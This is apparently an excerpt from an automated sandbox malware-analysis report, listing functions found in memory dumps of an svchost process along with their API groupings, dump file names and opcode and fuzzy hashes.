                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 7431853A749F55D2E611CF56ED447A97791FB88B86F1480248F481B766EF38C8678B00
                                                                                                                                  Function 00000158709DC700 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                  • Opcode ID: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction ID: 7eacd84e6e4561a3f3e5c33e2a642925968237d9491b7905428477ac2ca8af61
                                                                                                                                  • Opcode Fuzzy Hash: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction Fuzzy Hash: 83113D7C289A49C2FA58A731AC513ED3156ABCCB96F744624E8167E3D7DE28D8038F40
                                                                                                                                  Function 00000158709D3BE4 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: b7d3a55e7fc48ea011ed11a46bb2ed8e27d156717ae0d708129dddf4e4097676
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: B501217D211F44D2EB249B25EC4879573A0BBCCB87F240024DD8D2A365EF3DC45A8B40
                                                                                                                                  Function 00000158709D1AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                  • String ID: \\?\
                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: 37edd2f1eb96578f27aa37a320828f57c82a807689fd93679e40dc7327077ee8
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: 15F08177304A85E2E7208F20EC847997360F78CBCAF944021DA495AA68DE6CCA5ACF00
                                                                                                                                  Function 00000158709DB6C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 4b4cb5a5a4820c782e9399f4b1a9c2182f654f321a0731fa6e71007be662d636
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: ACF0627A215E04D1EA108B24DC443A93320ABCD7A2F640619D9695D6F5CF29C85ACA00
                                                                                                                                  Function 00000158709D34D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: 1ea1fd68a931247748b97e4f44f69674a0b5e6a672685b0ca4d60dd4f6b794ea
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: A4F08979714F40D1EA404B13BD142957210ABCCFC2F549030ED5A5BB29DE2CC8538B00
                                                                                                                                  Function 00000158709D5C10 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction ID: 17cad6c07639f0ef10160b8f8cb9ffa8b9a2869179d51cccef6133f06d9c3097
                                                                                                                                  • Opcode Fuzzy Hash: 0441838d824fc983c730246148d7a7fc38d6cc047019034bf9020db6d46abb4c
                                                                                                                                  • Instruction Fuzzy Hash: 6C61A83A16DF48D6EAA08B15E85435AB7A4F3C8786F200116EA8D9BBA5DF7CC541CF00
                                                                                                                                  Function 00000158709D8A60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: f38b6193115cc56af989a24502abc0d67f15a4ec256bb872dc9829a3c0764656
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: 3351C976366E04CADB14CF25E844BAEB391F3C8B99F248111DA855B74BDF79D842CB00
                                                                                                                                  Function 00000158709A9C6C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  • Opcode ID: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction ID: fc1dd02edc12355f96b8c6091c764dbb9291bb19f66b11988602bc71c3f8f41e
                                                                                                                                  • Opcode Fuzzy Hash: 74794b81e2150fdd3247c6b0929cf94a133a79a7c698cea2745a4c727450e9e7
                                                                                                                                  • Instruction Fuzzy Hash: 845176BA108A40CAEB748F159C4439977E0F3D8B96F344115EA99ABBD6CF34C892DF01
                                                                                                                                  Function 00000158709D3720 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  • Opcode ID: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction ID: ad45d22ad7a6753d79fe8c222c5ea2f5e9edbd916628ce97fb90c6b8838d5ca3
                                                                                                                                  • Opcode Fuzzy Hash: 6ea48c97d0836b8524b32f86ee4346f1c82ecd9c2f2f8412e357fece5ccf2637
                                                                                                                                  • Instruction Fuzzy Hash: 281163BA358F45D1EB109735EC403D972A4B7CC783FA04025EA59ABA96EF68CD17CB00
                                                                                                                                  Function 00000158709E26B4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000158709E269F), ref: 00000158709E27D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  • Opcode ID: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction ID: 298409d3a7e361afb17375243e6bb2b44ea0b2f0bbf748d1a9b29aaa4d750813
                                                                                                                                  • Opcode Fuzzy Hash: fd23e56fc5cd1019f1e5392f0e1397cafcae10da8a00d9ee5e5162c1d6a2f59c
                                                                                                                                  • Instruction Fuzzy Hash: 0691B03B610A50C5FB549B65DC407ED3BA0B39CB8AF64110ADE4A7B7A5CE35C856CB00
                                                                                                                                  Function 00000158709D24F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction ID: 2d0ac19cec24b1b09804199140b85983ea6f3e7ef139a1f945529a88b555fd7e
                                                                                                                                  • Opcode Fuzzy Hash: f8c31f6540fb76418ba81280ca63f5f7a8befbb637495ae6adf665db7b557686
                                                                                                                                  • Instruction Fuzzy Hash: DB71A13A248B85C6E775CF25DC443E977A1F3ED786FA44016DD496BB9ADE34C6028B00
                                                                                                                                  Function 00000158709D27D4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileType
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3081899298-91387939
                                                                                                                                  • Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction ID: 38daa94b86bee1b1384bb35c4271310a79bbe3cd8cb2a03f7da892b01cc4fe68
                                                                                                                                  • Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
                                                                                                                                  • Instruction Fuzzy Hash: 0171D33A248F85C2E7349F26DD543EA7791F3DC786F650016DE096BB9ADE34C6028B00
                                                                                                                                  Function 00000158709A7E60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 3242871069-1018135373
                                                                                                                                  • Opcode ID: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction ID: f14f1dd50eec166e2868218d6e961808d20ad14834388aceb6526f4816ae642c
                                                                                                                                  • Opcode Fuzzy Hash: c05350e615053b7500426fc17c40756232b0b69f88985873800782e1d6faf427
                                                                                                                                  • Instruction Fuzzy Hash: D051D47A319E10CAEB14CF15EC44BEDB791F388B9AF218120EA555B784DF79C846DB00
                                                                                                                                  Function 00000158709A98BC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000003.1468191534.00000158709A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_3_158709a0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3163161869-2084237596
                                                                                                                                  • Opcode ID: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction ID: 0ed317e4bfe07071f596045d1d0a5e92573602493c84a80b975c9ec0ac44a7a6
                                                                                                                                  • Opcode Fuzzy Hash: 9bdaa800d01c6c5a185cdc55968300698a35ff746a3365fefcfd6d909ecc6556
                                                                                                                                  • Instruction Fuzzy Hash: 55619FB6508BC4C5EB608B15E8403DAB7A0F7C9B99F144216EB992BB99DF7CC191CF00
                                                                                                                                  Function 00000158709E2420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                  • String ID: U
                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                  • Opcode ID: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction ID: 47084f64c60144e124efa807debc3cd6c0f35b8b499574547f0504f75fa0d602
                                                                                                                                  • Opcode Fuzzy Hash: c300b062bf40c1b0f0350794fff0bce10eccca881518eaa2bc6995b38d179998
                                                                                                                                  • Instruction Fuzzy Hash: 5941B177625E84C6E760DF25E8047D9B7A4F38C785FA04125EA4D9B7A8EF38C812CB50
                                                                                                                                  Function 00000158709D8F38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                  • Opcode ID: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction ID: 56241c786a7a0986ce0c760056f56ba35da91e0b9687e7c6e5b38bfe6fa9ad6d
                                                                                                                                  • Opcode Fuzzy Hash: 05c643ba0fff1e06ef6870c314c11f152e6731387db1d0900097cc2ceff7ecf8
                                                                                                                                  • Instruction Fuzzy Hash: F5111C36218F44D2EB618B15E84039AB7E5F78CB95F684224EA8D1B766DF38C952CB40
                                                                                                                                  Function 00000158709D1D2C Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2794758401.00000158709D1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2793726548.00000158709D0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2795956309.00000158709E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2797058646.00000158709F0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2798067827.00000158709F2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2799133446.00000158709F9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_158709d0000_svchost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 756756679-0
                                                                                                                                  • Opcode ID: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction ID: cadc8f88e6aa4b80ff665573fdb03b3ebaba0c016ef8fe6c3048e5e72e7373ce
                                                                                                                                  • Opcode Fuzzy Hash: 44cd146342faa2683118c2083562395920ada9481bf43a04c3a7edce6a0c89e5
                                                                                                                                  • Instruction Fuzzy Hash: AE115E26615F84D1EA04CB66A80839977B1F7CCFD1F684128DE4D6B765DF38D8928740
                                                                                                                                  Function 00000158709D1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
